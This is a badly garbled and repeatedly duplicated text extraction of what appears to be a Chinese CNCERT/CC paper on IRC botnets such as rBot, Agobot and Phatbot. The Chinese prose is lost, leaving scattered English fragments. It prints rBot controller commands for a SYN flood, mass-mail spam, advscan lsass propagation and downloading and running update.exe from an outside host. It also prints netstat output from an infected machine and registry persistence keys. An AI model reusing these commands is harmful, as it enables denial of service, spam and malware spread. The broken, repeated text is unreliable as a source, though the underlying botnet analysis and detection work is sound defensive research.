5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
